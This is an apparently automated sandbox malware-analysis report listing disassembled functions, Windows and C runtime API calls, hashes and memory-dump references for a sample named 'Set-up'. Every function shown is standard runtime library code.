Instruction Fuzzy Hash: 7041D831A056719FDB498F78C985B98B7A0FF06B14F0C025CE916C7290DB75E811CBD0

Function 6BB6C038 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB6C0FC
__doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD25
_errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD2D
_errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD43
_invalid_parameter_noinfo.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD4E
__doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD55
_errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD5D
_errno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD6A
__doserrno.MSVCR100(6BB6C0D8,00000010,6BB6CE99,00000000,?,?,?,?,6BB73379,?), ref: 6BB8FD75

Part of subcall function 6BB6A5A9: EnterCriticalSection.KERNEL32(00000108,6BB6A610,0000000C,6BB7038E,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB6A5FA

Part of subcall function 6BB6BF22: ReadFile.KERNEL32(?,00000040,?,?,00000000,?,?,?), ref: 6BB6BFE8

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$CriticalEnterFileReadSection_invalid_parameter_noinfo
String ID:
API String ID: 590220429-0
Opcode ID: a63e595d393b8d6369625aca4819fa00540afef82b281a525c5825f98ceccafc
Instruction ID: 0c6c9fdb73f8f4e83fc5d9e981ad53bcc77b5c8b1b3037c488cfd7a94fd81598
Opcode Fuzzy Hash: a63e595d393b8d6369625aca4819fa00540afef82b281a525c5825f98ceccafc
Instruction Fuzzy Hash: 4A216F718543C59FDB219FB8C982B5D3760AF02369F510685D6349B1E0FBBD8D408F61

Function 6BB6A9DB Relevance: 13.6, APIs: 9, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc_crt.MSVCR100(00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB8B
_lock.MSVCR100(0000000A,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6AB9D
InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB6ABB4
__FF_MSGBANNER.LIBCMT ref: 6BB8749F
__NMSG_WRITE.LIBCMT ref: 6BB874A6
_errno.MSVCR100(6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB874B9

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin_errno_lock_malloc_crt
String ID:
API String ID: 957642387-0
Opcode ID: 4092fcfb45747a9814d88b932cf1b5c653b44ee96928fd3276bb02e5d62cc0d6
Instruction ID: 66bb20ce10569debef11e3c87c746f56235dad9bc4312179b8431c0dc2bb6d78
Opcode Fuzzy Hash: 4092fcfb45747a9814d88b932cf1b5c653b44ee96928fd3276bb02e5d62cc0d6
Instruction Fuzzy Hash: 8F1191326483D2DEEB106FB69882A2D7BA09F81798F54406ED1156B1C0FBBC4E819F51

Function 6BB627B6 Relevance: 13.5, APIs: 9, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?), ref: 6BB627D7
GetLastError.KERNEL32 ref: 6BB6FA08
__dosmaperr.LIBCMT(00000000), ref: 6BB6FA0F
_errno.MSVCR100 ref: 6BB6FA15
__doserrno.MSVCR100 ref: 6BB87B05
_errno.MSVCR100 ref: 6BB87B0C
_invalid_parameter_noinfo.MSVCR100 ref: 6BB87B16
__doserrno.MSVCR100 ref: 6BB87B22
_errno.MSVCR100 ref: 6BB87B2D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
String ID:
API String ID: 2636503730-0
Opcode ID: 1322ea12e1ee49807201179eb13c233ca241e947b0f2c45707098406ae5412e4
Instruction ID: 07fe8b88831e45e9b9a4ddc012fb7fd0a9af30bf73d57493995beb561c3475f9
Opcode Fuzzy Hash: 1322ea12e1ee49807201179eb13c233ca241e947b0f2c45707098406ae5412e4
Instruction Fuzzy Hash: F90181315486E49FDB166FBAD846BAD3765DF027E8F014155E8288B1A0FB7C8C42CFA1

Function 6BBA61D3 Relevance: 13.5, APIs: 9, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BBA61DA
__ExceptionPtrCopy.LIBCMT(?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61F1

Part of subcall function 6BBABBFB: __EH_prolog3.LIBCMT ref: 6BBABC02
Part of subcall function 6BBABBFB: _Reset.LIBCMT ref: 6BBABC21

?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA61FB

Part of subcall function 6BBABB8A: shared_ptr.LIBCMT ref: 6BBABB94

??3@YAXPAX@Z.MSVCR100(00000008,00000008,?,00000008,00000014,6BBA58ED,?,?,00000000), ref: 6BBA6201
__uncaught_exception.MSVCR100 ref: 6BBA620D
__ExceptionPtrCopy.LIBCMT(?,?), ref: 6BBA621E
?__ExceptionPtrRethrow@@YAXPBX@Z.MSVCR100(?,?,?), ref: 6BBA622B
?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?,?,?,?), ref: 6BBA6238
?__ExceptionPtrDestroy@@YAXPAX@Z.MSVCR100(?), ref: 6BBA6248

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: Exception$Destroy@@$CopyH_prolog3$??3@ResetRethrow@@__uncaught_exceptionshared_ptr
String ID:
API String ID: 1394407404-0
Opcode ID: 7a09e8ab6d401e18d865a356ed6e7521ea579b4ca3383ce415a26d3a4bb6f17f
Instruction ID: c962708f175db785c99e1d588ecd4313df60a7f4045124b04d49430b534fd32d
Opcode Fuzzy Hash: 7a09e8ab6d401e18d865a356ed6e7521ea579b4ca3383ce415a26d3a4bb6f17f
Instruction Fuzzy Hash: 98017172C056D8AADF20DBF48946BDDB778EF09219F840294D660A30C0E73D964587B1

Function 6BB6D963 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

Strings

generic-type-, xrefs: 6BB6D9D6
template-parameter-, xrefs: 6BB6D9AA, 6BB8DC63

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID: generic-type-$template-parameter-
API String ID: 0-13229604
Opcode ID: fba92ec4cc7128d608389a23a0f7b5477be6d33df2b6d0b257a42dc1afafab41
Instruction ID: 8f4d53fb089c43b1f0fa2336b95f3093ec181647bf9bfcaa30408b9318cdd849
Opcode Fuzzy Hash: fba92ec4cc7128d608389a23a0f7b5477be6d33df2b6d0b257a42dc1afafab41
Instruction Fuzzy Hash: CE617271D482889FCB04CFB8E491AEE7BF9FB0A344F65006ED555A7290E7799E04CB50

Function 6BB65489 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT(00000000,00000000,00000090,00000083,00000001,000000BC,?,6BB65B4D,?,00000001,00000000,00000000,00000005), ref: 6BB6549D
strncpy_s.MSVCR100(00000080,00000010,00000001,0000000F,00000000,00000000,00000005), ref: 6BB72BFB

Strings

_.,, xrefs: 6BB90ADD, 6BB90B72

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _memsetstrncpy_s
String ID: _.,
API String ID: 1794348173-2709443920
Opcode ID: 3a55aaa5b19bbfa1e48dce6514186c29bd11fce8499ee910965d39b849590bd3
Instruction ID: bdca5b88c0c72a5faf8ac6b0d82146c53cbc270119ec9984f68859f5e4a55107
Opcode Fuzzy Hash: 3a55aaa5b19bbfa1e48dce6514186c29bd11fce8499ee910965d39b849590bd3
Instruction Fuzzy Hash: F031EB725492C5FDE710AA649C01BDE375EDF0736CF844471FE5896082E73CD5408761

Function 6BB62719 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 91COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB89333
_invalid_parameter_noinfo.MSVCR100 ref: 6BB8933E
_errno.MSVCR100(?), ref: 6BB8934B
_invalid_parameter_noinfo.MSVCR100(?), ref: 6BB89356

Strings

B, xrefs: 6BB6274E

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
Instruction ID: 159f5effcb052acf6ce6e15a76850d906666111b74f7c887b73ef4703f7b8391
Opcode Fuzzy Hash: dfb0138fbacceb2ed61b1254190d5228ed7b83fcb00fb3b19c5fa06f21955bf8
Instruction Fuzzy Hash: 8F316F318042999FEF009FB8C8818EE77B4FF49364F50062AE920A71D1E73D99018FA5

Function 6BB69518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB88EE3
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88EEE
_errno.MSVCR100 ref: 6BB88EFB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB88F06

Strings

B, xrefs: 6BB6954D

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 5dfe4bd0d776542f396be993e9a7b325b44c8f4325efb2e67d50cfe0f4532dd6
Instruction ID: ec84b8d355cc9edcb7d47220101937e539d591fb19427846a98404c8a5a0cf2a
Opcode Fuzzy Hash: 5dfe4bd0d776542f396be993e9a7b325b44c8f4325efb2e67d50cfe0f4532dd6
Instruction Fuzzy Hash: 4A2174729042999FEF019FA8CC819EE77B8FB09364F500667E520A7181E77D9C058BA5

Function 6BB61860 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB892C0
_invalid_parameter_noinfo.MSVCR100 ref: 6BB892CB
_errno.MSVCR100 ref: 6BB892D8
_invalid_parameter_noinfo.MSVCR100 ref: 6BB892E3

Strings

B, xrefs: 6BB61895

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID: B
API String ID: 2959964966-1255198513
Opcode ID: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
Instruction ID: 4d0de1f1c3d7f064c5112d4fee1272c24ce078088a8618c850b404a5585b8619
Opcode Fuzzy Hash: 5765919894b30d5b86ac3d29871ac6afc4c7dab84d3569b456cd77ba54153e89
Instruction Fuzzy Hash: BC2160729002A99FEF009FE9CC818EE77B4FB09364B14162AE530A7181E77D98058BA5

Function 6BB74D6D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 6BB75152

Strings

..., xrefs: 6BB8D226
,<ellipsis>, xrefs: 6BB8D1F1, 6BB8D1F6
<ellipsis>, xrefs: 6BB8D22D, 6BB8D232
,..., xrefs: 6BB8D1EA
void, xrefs: 6BB7514A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: NameName::
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1333004437-2211150622
Opcode ID: 3f9f3bb096cacff389149df9c65020af74f82f1db7360e214aa7cd9cdf468d49
Instruction ID: b87cd28661febeee0f8b13b25a3687a68202818e47daa532324372fd35f09a48
Opcode Fuzzy Hash: 3f9f3bb096cacff389149df9c65020af74f82f1db7360e214aa7cd9cdf468d49
Instruction Fuzzy Hash: 98214F31740685AFCB01DF1CE4449AA7BF5FF5638AB4180AAE855DF211CB39EA02CB40

Function 6BB73BB0 Relevance: 12.2, APIs: 8, Instructions: 214stringCOMMON

Download Yara Rule

APIs

strncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6BB73C42
_ismbblead.MSVCR100(00000001), ref: 6BB73C61
strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CB5
strncpy_s.MSVCR100(?,?,?,?), ref: 6BB73CEA
_errno.MSVCR100 ref: 6BB90F5B
_invalid_parameter_noinfo.MSVCR100 ref: 6BB90F6A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: strncpy_s$_errno_invalid_parameter_noinfo_ismbblead
String ID:
API String ID: 519590025-0
Opcode ID: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
Instruction ID: 86443f47d4b2466331e4804f5c07a4420ff7ea75b0776e6605cec9aa9687a6b9
Opcode Fuzzy Hash: 4e00a091103d941e1c40a338997678d01b7d0434557b1924abd6fe849d78b28f
Instruction Fuzzy Hash: D3718631944AC8DFCF32AF28D8547DE3BA1EB86744F6501B6F87856144E379C982CB91

Function 6BB68E3C Relevance: 12.2, APIs: 8, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bdde8d1928b69ec94474110a01d60dbf1ed264d7b3ef511e4efdda36b45b28f
Instruction ID: 9417463cdb4ccd617f6dfcbdb655bfe882ce01034942ad06caa759bed162a4df
Opcode Fuzzy Hash: 3bdde8d1928b69ec94474110a01d60dbf1ed264d7b3ef511e4efdda36b45b28f
Instruction Fuzzy Hash: 21716871D0029ADFDF10DFA4C8909FEBBB5FB06314B1405AAE525A7284E739D980CFA1

Function 6BB64DDA Relevance: 12.2, APIs: 8, Instructions: 175stringCOMMON

Download Yara Rule

APIs

__expandlocale.LIBCMT ref: 6BB64E34

Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D

strcmp.MSVCR100(?,00000048,?,?,?,00000001,00000000,00000000), ref: 6BB64E50
_strpbrk.LIBCMT(00000005,6BB73008,00000001,00000000,00000000), ref: 6BB72FCD
strncmp.MSVCR100(6BB64AD4,00000005,00000000,00000001,00000000,00000000), ref: 6BB7300F
_strlen.LIBCMT(6BB64AD4,00000001,00000000,00000000), ref: 6BB73036
_strcspn.LIBCMT(00000001,6BB6498C,00000001,00000000,00000000), ref: 6BB7304B
strncpy_s.MSVCR100(?,00000083,00000001,00000000,00000001,00000000,00000000), ref: 6BB73075

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: __expandlocale_getptd_strcspn_strlen_strpbrkstrcmpstrcpy_sstrncmpstrncpy_s
String ID:
API String ID: 1101789701-0
Opcode ID: 5cb25875ac85b09ac689ab3dc967168328b8b570b06de5173fc2d882b1b5d9e8
Instruction ID: 91b615a637057d108304171e8b3ffd93d9543e2e251cdd4a98f6d44d5552dc04
Opcode Fuzzy Hash: 5cb25875ac85b09ac689ab3dc967168328b8b570b06de5173fc2d882b1b5d9e8
Instruction Fuzzy Hash: E1512771D046D59EEF349A748CA1B9EB7B8EB01384F1044FAD528E3142FB3D8E858B20

Function 6BBBFDBB Relevance: 12.2, APIs: 8, Instructions: 173COMMON

Download Yara Rule

APIs

_errno.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDD5
_invalid_parameter_noinfo.MSVCR100(?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFDE0

Part of subcall function 6BBDAEAE: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6BBAB84F,?,6BBAC3D3,00000003,6BB874A4,6BB6AA18,0000000C,6BB874F7,00000001,00000001), ref: 6BBDAEB5

_errno.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE01
_invalid_parameter_noinfo.MSVCR100(00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE0C
__stricmp_l.LIBCMT(00000001,00000000,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFE36

Part of subcall function 6BBD0E0D: _errno.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E28
Part of subcall function 6BBD0E0D: _invalid_parameter_noinfo.MSVCR100(?,00000000,?,00000000,00000000,00000005), ref: 6BBD0E33

__crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,00000000,?,?,?,00000000), ref: 6BBBFE8C
__crtLCMapStringA.MSVCR100(?,00000000,00000200,00000001,00000002,6BC06CD0,00000002,?,00000001,?,?,?,?,?,?,?), ref: 6BBBFF0D
_errno.MSVCR100(?,?,?,?,?,?,?,00000000,?,?,?,00000000,00000001,6BC06CD0), ref: 6BBBFF6A

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$String__crt$__stricmp_l_invalid_parameter
String ID:
API String ID: 2295373847-0
Opcode ID: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
Instruction ID: 7a62e79886e36582c6bc174c105d2237007962694bc9f76a92ea8bbceeb8582f
Opcode Fuzzy Hash: 603d863ab6191c6e4dbf1b298263febe787c94863279d14a6e9d934dd312b481
Instruction Fuzzy Hash: EA510779D042D9ABDB158B68C495BBD7BB0EF42728F2481D9E0B15F1D2DB3C8A41CB50

Function 6BB64286 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCR100(?,?,6BB642B4,?), ref: 6BB8875A
_invalid_parameter_noinfo.MSVCR100(?,?,6BB642B4,?), ref: 6BB88765

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: 9c47925c3d70f2bc29667c23525f367317937b640bcb55925b4d3f851b8926e7
Instruction ID: 9a71b7eea12a85b142414b4996d40a351f6288c94d869789cdcdbd7f303d38f3
Opcode Fuzzy Hash: 9c47925c3d70f2bc29667c23525f367317937b640bcb55925b4d3f851b8926e7
Instruction Fuzzy Hash: A031B572460B918FD7218F39DC41B5A77A0EF06774B208A5DD4B58A190E73CE985CF80

Function 6BB6CE44 Relevance: 12.1, APIs: 8, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,?,?,?,6BB73379,?), ref: 6BB6CE8D
_read.MSVCR100(00000000,?,?,?,?,6BB73379,?), ref: 6BB6CE94
_fileno.MSVCR100(?), ref: 6BB6CEB7
_fileno.MSVCR100(?), ref: 6BB6CEC7
_fileno.MSVCR100(?), ref: 6BB6CED8
_fileno.MSVCR100(?,?), ref: 6BB6CEE8
_errno.MSVCR100(?,?,6BB73379,?), ref: 6BB8870C
_invalid_parameter_noinfo.MSVCR100(?,?,6BB73379,?), ref: 6BB88717

Memory Dump Source

Source File: 00000003.00000002.1984577957.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true

Associated: 00000003.00000002.1984546404.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984684027.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984717343.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000003.00000002.1984745612.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6bb50000_Set-up.jbxd

Similarity

API ID: _fileno$_errno_invalid_parameter_noinfo_read
String ID:
API String ID: 2022966298-0
Opcode ID: 29b36f79c09d31aab98bc0a3cd6cf14587c0fa3d2006f53cac26df71cc54977d
Instruction ID: acb6b36169d82fe8454eedf0f93953aa0289102be20ca85b907466b6e806802c
Opcode Fuzzy Hash: 29b36f79c09d31aab98bc0a3cd6cf14587c0fa3d2006f53cac26df71cc54977d
